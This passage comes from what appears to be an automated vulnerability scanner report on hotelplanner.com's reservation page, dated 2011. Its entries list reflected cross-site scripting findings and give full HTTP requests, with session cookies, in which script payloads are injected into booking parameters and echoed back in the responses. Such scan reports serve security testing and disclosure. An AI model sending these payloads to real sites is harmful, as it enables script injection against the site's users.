Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=277570"><script>alert(1)</script>39a512bdb59&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPe
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:27 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58996

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<a href="http://www.HotelPlanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/4/2011&outDate=10/7/2011&NumRooms=1&NumBeds=&NumAdults=277570"><script>alert(1)</script>39a512bdb59&NumChildren=0#Avail">
...[SNIP]...

4.304. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfAdults parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the numberOfAdults request parameter is copied into the HTML document as plain text between tags. The payload 15138<script>alert(1)</script>561283b1b15 was submitted in the numberOfAdults parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=215138<script>alert(1)</script>561283b1b15&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPe
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:29 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<br>
                   Adults: 215138<script>alert(1)</script>561283b1b15&nbsp;&nbsp;Children: 0
                   <div align="right">
...[SNIP]...

4.305. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfChildren parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the numberOfChildren request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb05"><script>alert(1)</script>d904716273c was submitted in the numberOfChildren parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=07bb05"><script>alert(1)</script>d904716273c&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeabl
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:38 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58996

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<a href="http://www.HotelPlanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/4/2011&outDate=10/7/2011&NumRooms=1&NumBeds=&NumAdults=2&NumChildren=07bb05"><script>alert(1)</script>d904716273c#Avail">
...[SNIP]...

4.306. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfChildren parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the numberOfChildren request parameter is copied into the HTML document as plain text between tags. The payload 91311<script>alert(1)</script>6f2b54e81f4 was submitted in the numberOfChildren parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=091311<script>alert(1)</script>6f2b54e81f4&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeabl
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:40 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<br>
                   Adults: 2&nbsp;&nbsp;Children: 091311<script>alert(1)</script>6f2b54e81f4
                   <div align="right">
...[SNIP]...

4.307. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfRooms parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the numberOfRooms request parameter is copied into an HTML comment. The payload 27273--><img%20src%3da%20onerror%3dalert(1)>cc789263516 was submitted in the numberOfRooms parameter. This input was echoed as 27273--><img src=a onerror=alert(1)>cc789263516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=127273--><img%20src%3da%20onerror%3dalert(1)>cc789263516&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAn
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:32:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 127273--><img src=a onerror=alert(1)>cc789263516 cannot be converted to a number. <br>
...[SNIP]...

4.308. https://www.hotelplanner.com/Accept/Reserve.cfm [promoDescription parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the promoDescription request parameter is copied into the HTML document as plain text between tags. The payload 1216d<script>alert(1)</script>7374d724c38 was submitted in the promoDescription parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
omRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=1216d<script>alert(1)</script>7374d724c38&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:25 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 59105

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<font color="3865a8">1216d<script>alert(1)</script>7374d724c38</font>
...[SNIP]...

4.309. https://www.hotelplanner.com/Accept/Reserve.cfm [promoDescription parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the promoDescription request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d50c"><script>alert(1)</script>f302cb1ee7a was submitted in the promoDescription parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
omRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=9d50c"><script>alert(1)</script>f302cb1ee7a&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:24 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 59111

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="promoDescription" value="9d50c"><script>alert(1)</script>f302cb1ee7a">
...[SNIP]...

4.310. https://www.hotelplanner.com/Accept/Reserve.cfm [promoType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the promoType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b617"><script>alert(1)</script>f2b3557c9b0 was submitted in the promoType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
ateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=7b617"><script>alert(1)</script>f2b3557c9b0&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:16 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="promoType" value="7b617"><script>alert(1)</script>f2b3557c9b0">
...[SNIP]...

4.311. https://www.hotelplanner.com/Accept/Reserve.cfm [propertyID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the propertyID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8fa7"><script>alert(1)</script>bb450458818 was submitted in the propertyID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
05.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159b8fa7"><script>alert(1)</script>bb450458818&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&b
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:20 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="propertyID" value="15159b8fa7"><script>alert(1)</script>bb450458818">
...[SNIP]...

4.312. https://www.hotelplanner.com/Accept/Reserve.cfm [propertyType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

